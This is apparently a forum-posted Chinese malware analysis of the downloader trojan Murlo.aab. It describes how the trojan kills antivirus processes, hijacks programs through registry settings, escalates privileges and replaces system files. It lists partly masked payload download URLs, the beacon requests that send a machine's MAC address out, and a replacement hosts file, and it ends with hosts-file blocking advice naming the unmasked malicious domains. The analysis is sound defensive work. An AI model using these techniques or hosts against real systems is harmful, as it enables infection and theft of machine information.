Trojan/Win32.Murlo.aab[Downloader]分析
一、 病毒标签:病毒名称: Trojan/Win32.Murlo.aab
病毒类型: 木马
文件 MD5: 460CDB6F5016A870FB7B36B45A79C586
公开范围: 完全公开
危害等级: 5
文件长度: 39,245 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG 2.0 -> bart/xt
二、 病毒描述:
该病毒为后门类,病毒运行后判断该进程执行的线程数,如果小于或等于10个,则退出程序;判断创建的互斥体是否名为“puuyt”,若此互斥变量存在,则退出进程;解密数据释放文件“1696”到%Temp%目录下;解密数据得到安全软件的进程名称后查看进程列表,如果存在,结束进程;添加映像劫持使下载软件迅雷无法使用;若发现机器中运行360保险箱,获取该程序的执行路径并尝试通过在命令行中加入 /u参数对其进行卸载;修改注册表通过关闭360服务的方式使360失效;衍生文件“1”到%Windir%\tasks目录下,并将该文件拷贝到所有非系统驱动器下含扩展名为“exe”文件的目录下,并更名为usp10.dll;创建线程监视当前窗口类名是否为“AfxControlBar42s”,如果是则关闭该窗口;修改注册表隐藏具有隐藏属性的文件,隐藏具有系统属性的文件;创建线程监视进程列表中是否存在进程名为“cmd.exe”或“Thunder5.exe”的进程,如果存在关闭该进程;连接网络下载病毒地址列表,并依照列表下载病毒文件并执行;获取本机信息发送到指定地址;下载文件替换正常的hosts文件屏蔽部分域名;下载病毒文件的最新版本并执行;修改注册表创建服务提权,执行后删除服务和文件;修改系统输入法文件。
三、 行为分析:
本地行为:
1、文件运行后会释放以下文件
%System32%\ctfmon.exe
%Windir%\Tasks\1
%Temp%1696
%非系统驱动器下的含exe文件的目录%\usp10.dll
2、新增注册表
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
新: DWORD: 2 (0x2)
旧: DWORD: 1 (0x1)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
新: DWORD: 0 (0)
旧: DWORD: 1 (0x1)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Thunder5.exe\Debugger
键值: 字符串: "svchost.exe"
3、遍历进程,对特定进程进行处理
1)结束下列进程名
kavstart.exe、kissvc.exe、kmailmon.exe、kpfw32.exe、kpfwsvc.exe、kwatch.exe、 ccenter.exe、ras.exe、rstray.exe、rsagent.exe、ravtask.exe、ravstub.exe、ravmon.exe、ravmond.exe avp.exe、360safebox.exe、360Safe.exe、Thunder5.exe、rfwmain.exe、rfwstub.exe、rfwsrv.exe
2)对下面的进程进行实时监控,一经发现马上关闭
cmd.exe、thunder5.exe
4、检测当前窗口的类名称是否为“AfxControlBar42s”
向该窗口发送WM_CLOSE消息,并模拟键盘的回车键
5、创建提权服务,提升为SeDebugPrivilege权限
服务在注册表中的路径为:
HKLM\SYSTEM\CurrentControlSet\Services\io
6、调用控制码替换系统文件
建立“\\.\safebreas” 通过DeviceIoControl调用0x22001c,替换系统文件ctfmon.exe
网络行为:
1、连接网络下载病毒列表、依照列表下载样本并执行
地址:http://txt.hsdee**.com/oo.txt
IP:59.34.198.***
内容:
open=y
url1=http://www.wdswe**.com/new/new1.exe
url2=http://www.wdswe**.com/new/new2.exe
url3=http://www.wdswe**.com/new/new3.exe
url4=http://www.wdswe**.com/new/new4.exe
url5=http://www.wdswe**.com/new/new5.exe
url6=http://www.wdswe**.com/new/new6.exe
url7=http://www.wdswe**.com/new/new7.exe
url8=http://www.wdswe**.com/new/new8.exe
url9=http://www.wdswe**.com/new/new9.exe
url10=http://www.wdswe**.com/new/new10.exe
url11=http://www.wdswe**.com/new/new11.exe
url12=http://www.wdswe**.com/new/new12.exe
url13=http://www.wdswe**.com/new/new13.exe
url14=http://www.wdswe**.com/new/new14.exe
url15=http://www.wdswe**.com/new/new15.exe
url16=http://www1.wdswe**.com/new/new16.exe
url17=http://www1.wdswe**.com/new/new17.exe
url18=http://www1.wdswe**.com/new/new18.exe
url19=http://www1.wdswe**.com/new/new19.exe
url20=http://www1.wdswe**.com/new/new20.exe
url21=http://www1.wdswe**.com/new/new21.exe
url22=http://www1.wdswe**.com/new/new22.exe
url23=http://www1.wdswe**.com/new/new23.exe
url24=http://www1.wdswe**.com/new/new24.exe
url25=http://www1.wdswe**.com/new/new25.exe
url26=http://www1.wdswe**.com/new/new26.exe
url27=http://www1.wdswe**.com/new/new27.exe
url28=http://www1.wdswe**.com/new/new28.exe
count=28
2、下载文件替换hosts文件
地址:http://txt.hsdee**.com/ad.jpg
IP:59.34.1***.109
内容:
127.0.0.1** v.onondown**.com.cn
127.0.0.2** ymsdasdw1**.cn
127.0.0.3** h96b**.info
127.0.0.0** fuck.zttwp**.cn
127.0.0.0** www.hackerbf**.cn
127.0.0.0** zzz.2008wyt**.net
127.1.1.1** 999.2005wyt**.com
127.0.0.0** ww.popdm**.cn
127.1.1.1** bbt.etimes888**.com
127.1.1.1** 219.147.13.53*
127.1.1.1** dl.360safe**.com
127.1.1.1** 20068080**.cn
127.1.1.1** l.neter888**.cn
127.1.1.1** stat.untang**.com
127.1.1.1** www.ikdy**.cn
127.0.0.0** geekbyfeng**.cn
127.0.0.0** 121.14.101.68*
127.0.0.0** ppp.etimes888**.com
127.0.0.0** www.bypk**.com
127.0.0.0** CSC3-2004-crl.verisign**.com
127.0.0.1** va9sdhun23**.cn
127.0.0.0** udp.hjob123**.com
127.1.1.1** 999.hfdy2828**.com
127.1.1.1** www.hfdy2929**.com
127.1.1.1** www.xiazaide1**.cn
127.1.1.1** www.vuf51579**.cn
127.1.1.1** wm.eo2q**.cn
127.1.1.1** d.www-263**.com
127.1.1.1** www.ssy1688**.cn
127.1.1.1** 121.12.173.21*
127.1.1.1** qq.18i16**.net
127.1.1.1** a.baidu-6661**.com
127.1.1.1** www.vuf51579**.cn
127.1.1.1** www.1079223105**.cn
127.1.1.1** home.xzx6**.cn
127.1.1.1** top.fgc3**.cn
127.1.1.1** 165.246.44.22*
127.1.1.1** wwww.ttfafa*.com
127.1.1.1** pa.tt-09**.com
127.0.0.2** bnasnd83nd**.cn
127.0.0.0** www.gamehacker**.com.cn
127.0.0.0** gamehacker.com**.cn
127.1.1.1** www.cctv-100008**.cn
127.1.1.1** 222.73.208.14*
127.0.0.3** adlaji**.cn
127.1.1.1** aiyyw**.com
127.0.0.1** 858656**.com
127.1.1.1** bnasnd83nd**.cn
127.0.0.1** my123**.com
127.0.0.0** user1.12-27**.net
127.0.0.1** 8749**.com
127.0.0.0** fengent**.cn
127.0.0.1** 4199**.com
127.0.0.1** user1.16-22**.net
127.0.0.1** 7379**.com
127.0.0.1** 2be37c5f.3f6e2cc5f0b**.com
127.0.0.1** 7255**.com
127.0.0.1** user1.23-12**.net
127.0.0.1** 3448**.com
127.0.0.1** www.guccia**.net
127.0.0.1** 7939**.com
127.0.0.1** a.o1o1o1**.nEt
127.0.0.1** 8009**.com
127.0.0.1** user1.12-73**.cn
127.0.0.1** piaoxue**.com
127.0.0.1** 3n8nlasd**.cn
127.0.0.1** kzdh**.com
127.0.0.0** www.sony888**.cn
127.0.0.1** about.blank**.la
127.0.0.0** user1.asp-33**.cn
127.0.0.1** 6781**.com
127.0.0.0** www.netkwek**.cn
127.0.0.1** 7322**.com
127.0.0.0** ymsdkad6**.cn
127.0.0.1** localhost**
127.0.0.0** www.lkwueir**.cn
127.0.0.1** 06.jacai**.com
127.0.1.1** user1.23-17**.net
127.0.0.1** 1.jopenkk**.com
127.0.0.0** upa.luzhiai**.net
127.0.0.1** 1.jopenqc**.com
127.0.0.0** www.guccia**.net
127.0.0.1** 1.joppnqq**.com
127.0.0.0** 4m9mnlmi**.cn
127.0.0.1** 1.xqhgm**.com
127.0.0.0** mm119mkssd**.cn
127.0.0.1** 100.332233**.com
127.0.0.0** 61.128.171.11*:8080
127.0.0.1** 121.11.90.79*
127.0.0.0** www.1119111**.com
127.0.0.1** 121565**.net
127.0.0.0** win.nihao69**.cn
127.0.0.1** 125.90.88.38*
127.0.0.1** 16888.6to23**.com
127.0.0.1** 2.joppnqq**.com
127.0.0.0** puc.lianxiac**.net
127.0.0.1** 204.177.92.68*
127.0.0.0** pud.lianxiac**.net
127.0.0.1** 210.74.145.23*
127.0.0.0** 210.76.0.13*
127.0.0.1** 219.129.239.22*
127.0.0.0** 61.166.32.2*
127.0.0.1** 219.153.40.22*
127.0.0.0** 218.92.186.27*
127.0.0.1** 219.153.46.27*
127.0.0.0** www.fsfsfag**.cn
127.0.0.1** 219.153.52.12*
127.0.0.0** ovo.ovovov**.cn
127.0.0.1** 221.195.42.71*
127.0.0.0** dw.com**.com
127.0.0.1** 222.73.218.11*
127.0.0.1** 203.110.168.23*:80
127.0.0.1** 3.joppnqq**.com
127.0.0.1** 203.110.168.22*:80
127.0.0.1** 363xx**.com
127.0.0.1** www1.ip10086**.com.cm
127.0.0.1** 4199**.com
127.0.0.1** blog.ip10086**.com.cn
127.0.0.1** 43242**.com
127.0.0.1** www.ccji68**.cn
127.0.0.1** 5.xqhgm**.com
127.0.0.0** t.myblank**.cn
127.0.0.1** 520.mm5208**.com
127.0.0.0** x.myblank**.cn
127.0.0.1** 59.34.131.54*
127.0.0.1** 210.51.45.5*
127.0.0.1** 59.34.198.22*
127.0.0.1** www.ew1q**.cn
127.0.0.1** 59.34.198.8*
127.0.0.1** 59.34.198.97*
127.0.0.1** 60.190.114.10*
127.0.0.1** 60.190.218.34*
127.0.0.0** qq-xing.com**.cn
127.0.0.1** 60.191.124.25*
127.0.0.1** 61.145.117.21*
127.0.0.1** 61.157.109.22*
127.0.0.1** 75.126.3.21*
127.0.0.1** 220.250.64.21*
127.0.0.1** 75.126.3.21*
127.0.0.1** 75.126.3.21*
127.0.0.0** 59.125.231.17*:17777
127.0.0.1** 75.126.3.22*
127.0.0.1** 75.126.3.22*
127.0.0.1** 75.126.3.22*
127.0.0.1** 772630**.com
127.0.0.1** 832823**.cn
127.0.0.1** 8749**.com
127.0.0.1** 888.jopenqc**.com
127.0.0.1** 89382**.cn
127.0.0.1** 8v8**.biz
127.0.0.1** 97725**.com
127.0.0.1** 9gg**.biz
127.0.0.1** www.9000music**.com
127.0.0.1** test.591jx**.com
127.0.0.1** a.topxxxx**.cn
127.0.0.1** picon.chinaren**.com
127.0.0.1** www.5566**.net
127.0.0.1** p.qqkx**.com
127.0.0.1** news.netandtv**.com
127.0.0.1** z.neter888**.cn
127.0.0.1** b.myblank**.cn
127.0.0.1** wvw.wokutu**.com
127.0.0.1** unionch.qyule**.com
127.0.0.1** www.qyule**.com
127.0.0.1** it.itjc**.cn
127.0.0.1** www.linkwww**.com
127.0.0.1** vod.kaicn**.com
127.0.0.1** www.tx8688**.com
127.0.0.1** b.neter888**.cn
127.0.0.1** promote.huanqiu**.com
127.0.0.1** www.huanqiu**.com
127.0.0.1** www.haokanla**.com
127.0.0.1** play.unionsky**.cn
127.0.0.1** www.52v**.com
127.0.0.1** www.gghka**.cn
127.0.0.1** icon.ajiang**.net
127.0.0.1** new.ete**.cn
127.0.0.1** www.stiae**.cn
127.0.0.1** o.neter888**.cn
127.0.0.1** comm.jinti**.com
127.0.0.1** www.google-analytics**.com
127.0.0.1** hz.mmstat**.com
127.0.0.1** www.game175**.cn
127.0.0.1** x.neter888**.cn
127.0.0.1** z.neter888**.cn
127.0.0.1** p.etimes888**.com
127.0.0.1** hx.etimes888**.com
127.0.0.1** abc.qqkx**.com
127.0.0.1** dm.popdm**.cn
127.0.0.1** www.yl9999**.com
127.0.0.1** www.dajiadoushe**.cn
127.0.0.1** v.onondown.com**.cn
127.0.0.1** www.interoo**.net
127.0.0.1** bally1.bally-bally**.net
127.0.0.1** www.bao5605509**.cn
127.0.0.1** www.rty456**.cn
127.0.0.1** www.werqwer**.cn
127.0.0.1** 1.360-1**.cn
127.0.0.1** user1.23-16**.net
127.0.0.1** www.guccia**.net
127.0.0.1** www.interoo**.net
127.0.0.1** upa.netsool**.net
127.0.0.1** js.users.51**.la
127.0.0.1** vip2.51**.la
127.0.0.1** web.51**.la
127.0.0.1** qq.gong2008**.com
127.0.0.1** 2008tl.copyip**.com
127.0.0.1** tla.laozihuolaile**.cn
127.0.0.1** www.tx6868**.cn
127.0.0.1** p001.tiloaiai**.com
127.0.0.1** s1.tl8tl**.com
127.0.0.1** s1.gong2008**.com
127.0.0.1** 4b3ce56f9g.3f6e2cc5f0b**.com
127.0.0.1** 2be37c5f.3f6e2cc5f0b**.com
3、向服务器回传本地信息
1)回传本地mac地址和病毒版本
http://tongji.ombb888**.cn/select/getmac.asp?x= 00-0C-29-9C-7B-01&y=a1&t= 401595
2)如果进程中有QQ.exe则发送信息如下格式
http://tongji1.ac5566**.cn/getmac.asp?x=00-0C-29-9C-7B-01&y=a1&t=IQQS
4、下载病毒的最新版本
地址1:http://www.hoho-3**.cn/gr.exe
地址2:http://www.hoho-3**.cn/down/gr.exe
IP:59.34.198.10*
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp%= C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
建议方案:
在hosts文件中屏蔽如下域名:
127.0.0.1www.hoho-3.cn
127.0.0.1tongji1.ac5566.cn
127.0.0.1tongji.ombb888.cn
127.0.0.1txt.hsdee.com
127.0.0.1www1.wdswe.com
127.0.0.1www.wdswe.com 斑竹的速度够快,期待彻底的解决方法
页:
[1]